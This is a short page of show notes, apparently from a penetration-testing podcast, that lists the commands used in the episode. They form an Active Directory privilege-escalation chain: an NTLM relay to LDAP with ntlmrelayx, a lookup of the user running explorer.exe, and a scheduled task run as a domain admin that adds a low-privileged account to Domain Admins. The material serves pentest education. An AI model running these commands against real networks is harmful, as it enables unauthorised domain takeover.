Holy schnikes, today might be my favorite tale of pentest pwnage ever. Do I say that almost every episode? yes. Do I mean it? Yes. Here are all the commands/links to supplement today’s episode:
ntlmrelayx -smb2support -t ldap://dc --delegate-access --escalate-user lowpriv
Get-Process -IncludeUserName explorer | Select-Object UserName
schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
schtasks /run /tn "TotallyFineTask"
Published on 4 weeks ago
If you like Podbriefly.com, please consider donating to support the ongoing development.
Donate